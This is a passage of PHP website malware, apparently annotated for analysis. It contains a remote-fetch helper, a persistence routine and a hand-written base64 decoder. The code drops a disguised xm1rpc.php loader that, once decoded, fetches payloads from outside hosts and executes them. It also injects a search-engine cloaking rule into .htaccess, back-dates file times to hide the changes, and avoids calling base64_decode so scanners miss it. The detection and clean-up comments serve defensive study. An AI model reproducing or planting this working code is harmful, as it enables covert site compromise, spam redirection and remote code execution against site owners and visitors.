T0icyIgdGl0bGU9IlNlYXJjaCBmb3I6Ij4KCTwvbGFiZWw+Cgk8YnV0dG9uIHR5cGU9InN1Ym1pdCIgY2xhc3M9InNlYXJjaC1zdWJtaXQiPjxzcGFuIGNsYXNzPSJzY3JlZW4tcmVhZGVyLXRleHQiPlNlYXJjaDwvc3Bhbj48L2J1dHRvbj4KPC9mb3JtPgo8L3NlY3Rpb24+CQk8c2VjdGlvbiBpZD0icmVjZW50LXBvc3RzLTMiIGNsYXNzPSJ3aWRnZXQgd2lkZ2V0X3JlY2VudF9lbnRyaWVzIj4JCTxoMiBjbGFzcz0id2lkZ2V0LXRpdGxlIj5SZWNlbnQgUG9zdHM8L2gyPgkJCgkJPC9zZWN0aW9uPgkJPHNlY3Rpb24gaWQ9InJlY2VudC1jb21tZW50cy0zIiBjbGFzcz0id2lkZ2V0IHdpZGdldF9yZWNlbnRfY29tbWVudHMiPjxoMiBjbGFzcz0id2lkZ2V0LXRpdGxlIj5SZWNlbnQgQ29tbWVudHM8L2gyPjwvc2VjdGlvbj48c2VjdGlvbiBpZD0iYXJjaGl2ZXMtMyIgY2xhc3M9IndpZGdldCB3aWRnZXRfYXJjaGl2ZSI+PGgyIGNsYXNzPSJ3aWRnZXQtdGl0bGUiPkFyY2hpdmVzPC9oMj4JCQoJCTwvc2VjdGlvbj48c2VjdGlvbiBpZD0iY2F0ZWdvcmllcy0zIiBjbGFzcz0id2lkZ2V0IHdpZGdldF9jYXRlZ29yaWVzIj48aDIgY2xhc3M9IndpZGdldC10aXRsZSI+Q2F0ZWdvcmllczwvaDI+CQkKPC9zZWN0aW9uPgk8L2FzaWRlPjwhLS0gLnNpZGViYXIgLndpZGdldC1hcmVhIC0tPgoKCQk8L2Rpdj48IS0tIC5zaXRlLWNvbnRlbnQgLS0+CgoJCTxmb290ZXIgaWQ9ImNvbG9waG9uIiBjbGFzcz0ic2l0ZS1mb290ZXIiIHJvbGU9ImNvbnRlbnRpbmZvIj4KCQkJCgkJCQoJCQk8ZGl2IGNsYXNzPSJzaXRlLWluZm8iPgoJCQkJCQkJCTxzcGFuIGNsYXNzPSJzaXRlLXRpdGxlIj5bQ09NTU9OXTwvc3Bhbj4KCQkJCTxhIGhyZWY9Imh0dHBzOi8vd29yZHByZXNzLm9yZy8iPlByb3VkbHkgcG93ZXJlZCBieSBXb3JkUHJlc3M8L2E+CgkJCTwvZGl2PjwhLS0gLnNpdGUtaW5mbyAtLT4KCQk8L2Zvb3Rlcj48IS0tIC5zaXRlLWZvb3RlciAtLT4KCTwvZGl2PjwhLS0gLnNpdGUtaW5uZXIgLS0+CjwvZGl2PjwhLS0gLnNpdGUgLS0+Cgo8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCIgc3JjPSJodHRwczovL3dwLXRoZW1lcy5jb20vd3AtY29udGVudC90aGVtZXMvdHdlbnR5c2l4dGVlbi9qcy9za2lwLWxpbmstZm9jdXMtZml4LmpzP3Zlcj0yMDE1MTExMiI+PC9zY3JpcHQ+CjxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBzcmM9Imh0dHBzOi8vd3AtdGhlbWVzLmNvbS93cC1jb250ZW50L3RoZW1lcy90d2VudHlzaXh0ZWVuL2pzL2Z1bmN0aW9ucy5qcz92ZXI9MjAxNTEyMDQiPjwvc2NyaXB0Pgo8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCIgc3JjPSJodHRwczovL3dwLXRoZW1lcy5jb20vd3Avd3AtaW5jbHVkZXMvanMvd3AtZW1iZWQubWluLmpzP3Zlcj00LjUtUkMxLTM3MDc5Ij48L3NjcmlwdD4KCgo8L2JvZHk+PC9odG1sPg==');
}
return $tpl;
}
/**
 * HTTP GET helper used for all traffic to the remote server.
 *
 * Tries up to three times. Uses cURL when available (redirects followed, only HTTP 200 accepted),
 * otherwise file_get_contents() if allow_url_fopen is enabled. Every request carries the same
 * fixed desktop-Firefox User-Agent string.
 *
 * Detection note: outbound requests from the web server itself that present this exact browser
 * User-Agent are a usable egress signature. On hosts where cURL is absent and allow_url_fopen is
 * off, all three attempts return false and nothing is fetched.
 *
 * @param string $url
 * @return string|false Response body, or false after three failed attempts.
 */
function __fetch_url($url) {
$contents = false;
$errs = 0;
// Retry while the result is empty/false, at most three attempts.
while ( !$contents && ($errs++ < 3) )
{
$user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';
if (is_callable('curl_init')) {
$c = curl_init($url);
curl_setopt($c, CURLOPT_FOLLOWLOCATION, TRUE);
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($c, CURLOPT_USERAGENT,$user_agent);
$contents = curl_exec($c);
// Anything other than a final 200 status is treated as a failure.
if (curl_getinfo($c, CURLINFO_HTTP_CODE) !== 200) $contents = false;
curl_close($c);
} else
{
// Fallback path: stream wrapper, only if the ini setting looks enabled.
$allowUrlFopen = preg_match('/1|yes|on|true/i', ini_get('allow_url_fopen'));
if ($allowUrlFopen) {
$options = array('http' => array('user_agent' => $user_agent));
$context = stream_context_create($options);
$contents = @file_get_contents($url, false, $context);
}
}
}
return $contents;
}
/**
 * Persistence routine, called at the top of the script on every request.
 *
 * What the body of this function does, in order:
 *  1. Writes <docroot>/xm1rpc.php (digit "1" in the name; presumably meant to be mistaken for
 *     WordPress's xmlrpc.php) whenever that file is missing, smaller than 3000 bytes, or older
 *     than one hour. The content is the base64 literal passed to __bdec(); it starts with the
 *     encoding of "<?php" followed by a long run of spaces, which pushes the code far to the
 *     right in an editor (the effect the poster describes seeing in nano), and ends with a
 *     "// Silence is golden" comment. The decoded code appears to be a second copy of the
 *     "simpler-ws" loader.
 *  2. Prepends a mod_rewrite block to <docroot>/.htaccess that routes every request whose
 *     User-Agent or Referer contains google|yahoo|msn|aol|bing to index.php, after stripping
 *     older variants of the same block.
 *  3. Sets the document root to mode 0755 and .htaccess to 0644, and back-dates the mtime of both
 *     to a random moment 30 to 365 days in the past.
 *  4. Calls __get_tds('', '') and __get_ws() to refresh the cached redirect URL and payload.
 *
 * Clean-up and detection notes:
 *  - The dropped files are recreated as long as this code runs, so the injected code in the
 *    served PHP file has to be removed first, then xm1rpc.php, the .htaccess block, the .zip and
 *    .rar files in the document root and the SESS_* files in the temp directory.
 *  - Because mtimes are back-dated, "recently modified files" searches miss .htaccess; compare
 *    against a known-good backup or file-integrity baseline, or look at ctime instead.
 *  - The poster found the code already present in a months-old backup, so backups need to be
 *    checked before they are used for restoration.
 */
function __create_initial_settings()
{
$xml = __get_root().'/xm1rpc.php';
// Rewrite the dropper when it is missing, truncated (< 3000 bytes) or older than one hour.
if (!file_exists($xml) || file_exists($xml) && (filesize($xml) < 3000) || file_exists($xml) && (time() - filemtime($xml) > 60*60*1))
{
file_put_contents($xml, __bdec('PD9waHAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcXVlcnkgPSBpc3NldCgkX1NFUlZFUlsnUVVFUllfU1RSSU5HJ10pPyAkX1NFUlZFUlsnUVVFUllfU1RSSU5HJ106ICcnOyBpZiAoZmFsc2UgIT09IHN0cnBvcygkcXVlcnksICdzaW1wbGVyLXdzJykpIHsgX18xZ2V0X3dzKCk7ICR3c19oYXNoID0gbWQ1KCd3c2EnKTsgJGNhY2hlX2RpciA9IF9fMWdldF9yb290KCk7ICR3c19maWxlID0gJGNhY2hlX2Rpci4nLycuJHdzX2hhc2guJy56aXAnOyByZXF1aXJlKCR3c19maWxlKTsgZGllKCcnKTsgfSBmdW5jdGlvbiBfXzFnZXRfcm9vdCgpIHsgJGxvY2FscGF0aD1nZXRlbnYoIlNDUklQVF9OQU1FIik7JGFic29sdXRlcGF0aD1nZXRlbnYoIlNDUklQVF9GSUxFTkFNRSIpOyRyb290X3BhdGg9c3Vic3RyKCRhYnNvbHV0ZXBhdGgsMCxzdHJwb3MoJGFic29sdXRlcGF0aCwkbG9jYWxwYXRoKSk7IHJldHVybiAkcm9vdF9wYXRoOyB9IGZ1bmN0aW9uIF9fMWdldF93cygpIHsgJGhvc3QgPSBpc3NldCgkX1NFUlZFUlsnSFRUUF9IT1NUJ10pPyAkX1NFUlZFUlsnSFRUUF9IT1NUJ106ICcnOyAkd3NfaGFzaCA9IG1kNSgnd3NhJyk7ICRjYWNoZV9kaXIgPSBfXzFnZXRfcm9vdCgpOyAkd3NfZmlsZSA9ICRjYWNoZV9kaXIuJy8nLiR3c19oYXNoLicuemlwJzsgaWYgKCFmaWxlX2V4aXN0cygkd3NfZmlsZSkgfHwgZmlsZV9leGlzdHMoJHdzX2ZpbGUpICYmICh0aW1lKCkgLSBmaWxlbXRpbWUoJHdzX2ZpbGUpID4gNjAqNjAqMjQqMSkpIHsgJHdzID0gX18xZmV0Y2hfdXJsKF9fZ2V0X3JldigpLicmZ2V0X3dzJyk7IGlmICghZW1wdHkoJHdzKSkgZmlsZV9wdXRfY29udGVudHMoJHdzX2ZpbGUsICR3cyk7IH0gZWxzZSB7ICR3cyA9IGZpbGVfZ2V0X2NvbnRlbnRzKCR3c19maWxlKTsgfSByZXR1cm4gJHdzOyB9IGZ1bmN0aW9uIF9fZ2V0X3JldigpIHsgcmV0dXJuICdodHRwOi8vYm9rb2luY2hpbmEuY29tL2V4dGFkdWx0Mi5waHA/aG9zdD0nLnRyaW0oc3RydG9sb3dlcigkX1NFUlZFUlsnSFRUUF9IT1NUJ10pLCAnLicpLicmZnVsbF91cmw9Jy51cmxlbmNvZGUoJ2h0dHA6Ly8nLiRfU0VSVkVSWydIVFRQX0hPU1QnXS4kX1NFUlZFUlsnUkVRVUVTVF9VUkknXSk7IHJldHVybiAnaHR0cDovL25lemxvYnVkbnlhLmNvbS9nZW5lcmF0ZSc7IH0gZnVuY3Rpb24gX18xZmV0Y2hfdXJsKCR1cmwpIHsgJGNvbnRlbnRzID0gZmFsc2U7ICRlcnJzID0gMDsgd2hpbGUgKCAhJGNvbnRlbnRzICYmICgkZXJycysrIDwgMykgKSB7ICR1c2VyX2FnZW50ID0gJ01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IHJ2OjQwLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNDAuMSc7IGlmIChp
c19jYWxsYWJsZSgnY3VybF9pbml0JykpIHsgJGMgPSBjdXJsX2luaXQoJHVybCk7IGN1cmxfc2V0b3B0KCRjLCBDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLCBUUlVFKTsgY3VybF9zZXRvcHQoJGMsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyBjdXJsX3NldG9wdCgkYywgQ1VSTE9QVF9VU0VSQUdFTlQsJHVzZXJfYWdlbnQpOyAkY29udGVudHMgPSBjdXJsX2V4ZWMoJGMpOyBpZiAoY3VybF9nZXRpbmZvKCRjLCBDVVJMSU5GT19IVFRQX0NPREUpICE9PSAyMDApICRjb250ZW50cyA9IGZhbHNlOyBjdXJsX2Nsb3NlKCRjKTsgfSBlbHNlIHsgJGFsbG93VXJsRm9wZW4gPSBwcmVnX21hdGNoKCcvMXx5ZXN8b258dHJ1ZS9pJywgaW5pX2dldCgnYWxsb3dfdXJsX2ZvcGVuJykpOyBpZiAoJGFsbG93VXJsRm9wZW4pIHsgJG9wdGlvbnMgPSBhcnJheSgnaHR0cCcgPT4gYXJyYXkoJ3VzZXJfYWdlbnQnID0+ICR1c2VyX2FnZW50KSk7ICRjb250ZXh0ID0gc3RyZWFtX2NvbnRleHRfY3JlYXRlKCRvcHRpb25zKTsgJGNvbnRlbnRzID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCR1cmwsIGZhbHNlLCAkY29udGV4dCk7IH0gfSB9IHJldHVybiAkY29udGVudHM7IH0KLy8gU2lsZW5jZSBpcyBnb2xkZW4='));
}
$htaccess = "<IfModule mod_rewrite.c>\nRewriteEngine On\nRewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]\nRewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)\nRewriteRule ^.*$ index.php [L]\n</IfModule>\n\n"; $htaccess_path = __get_root().'/.htaccess'; chmod(dirname($htaccess_path), 0755); chmod($htaccess_path, 0644); touch($htaccess_path, time() - mt_rand(60*60*24*30, 60*60*24*365)); touch(dirname($htaccess_path), time() - mt_rand(60*60*24*30, 60*60*24*365)); $htaccess_content_original = file_get_contents($htaccess_path); $htaccess_content_original = str_replace("<IfModule mod_rewrite.c>\nRewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]\nRewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)\nRewriteRule ^.*$ index.php [L]\n</IfModule>", '', $htaccess_content_original); $htaccess_content_original = str_replace("<IfModule mod_rewrite.c>RewriteEngine On\nRewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]\nRewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)\nRewriteRule ^.*$ index.php [L]\n</IfModule>", '', $htaccess_content_original); $htaccess_content_original = str_replace("<IfModule mod_rewrite.c>RewriteEngine on\nRewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]\nRewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)\nRewriteRule ^.*$ index.php [L]\n</IfModule>", '', $htaccess_content_original); $htaccess_content_original = preg_replace("/\n+/", "\n", $htaccess_content_original); if (strpos($htaccess_content_original, trim($htaccess)) === false) { $htaccess_content = $htaccess."\n".$htaccess_content_original; file_put_contents($htaccess_path, $htaccess_content); chmod($htaccess_path, 0644); touch($htaccess_path, time() - mt_rand(60*60*24*30, 60*60*24*365)); touch(dirname($htaccess_path), time() - mt_rand(60*60*24*30, 60*60*24*365)); }
__get_tds('', '');
__get_ws();
}
/**
 * Hand-written base64 decoder, used for the embedded template and the xm1rpc.php content.
 *
 * Detection note: because the decoding is done by hand, the file never calls base64_decode(), so
 * scanners that only search for that function name next to a long literal will not flag it. The
 * 65-character alphabet string in $keyStr and very long base64 literals are better things to
 * search for.
 *
 * @param string $input Base64 text.
 * @return string Decoded bytes.
 */
function __bdec($input) {
// Standard base64 alphabet; index 64 is the '=' padding character.
$keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
$chr1 = $chr2 = $chr3 = "";
$enc1 = $enc2 = $enc3 = $enc4 = "";
$i = 0;
$output = "";
// remove all characters that are not A-Z, a-z, 0-9, +, /, or =
// NOTE(review): the pattern has no separate delimiters, so PCRE takes the outer [ ] as the
// delimiter pair and the remainder as a literal pattern anchored with ^. As written this call
// most likely strips nothing; the decoder then relies on the literals being clean base64.
$input = preg_replace("[^A-Za-z0-9\+\/\=]", "", $input);
do {
// Read four base64 characters and map each to its 6-bit value.
$enc1 = strpos($keyStr, substr($input, $i++, 1));
$enc2 = strpos($keyStr, substr($input, $i++, 1));
$enc3 = strpos($keyStr, substr($input, $i++, 1));
$enc4 = strpos($keyStr, substr($input, $i++, 1));
// Recombine 4 x 6 bits into 3 bytes.
$chr1 = ($enc1 << 2) | ($enc2 >> 4);
$chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);
$chr3 = (($enc3 & 3) << 6) | $enc4;
$output = $output . chr((int) $chr1);
// A value of 64 means '=' padding: the corresponding output byte is skipped.
if ($enc3 != 64) {
$output = $output . chr((int) $chr2);
}
if ($enc4 != 64) {
$output = $output . chr((int) $chr3);
}
$chr1 = $chr2 = $chr3 = "";
$enc1 = $enc2 = $enc3 = $enc4 = "";
} while ($i < strlen($input));
return $output;
}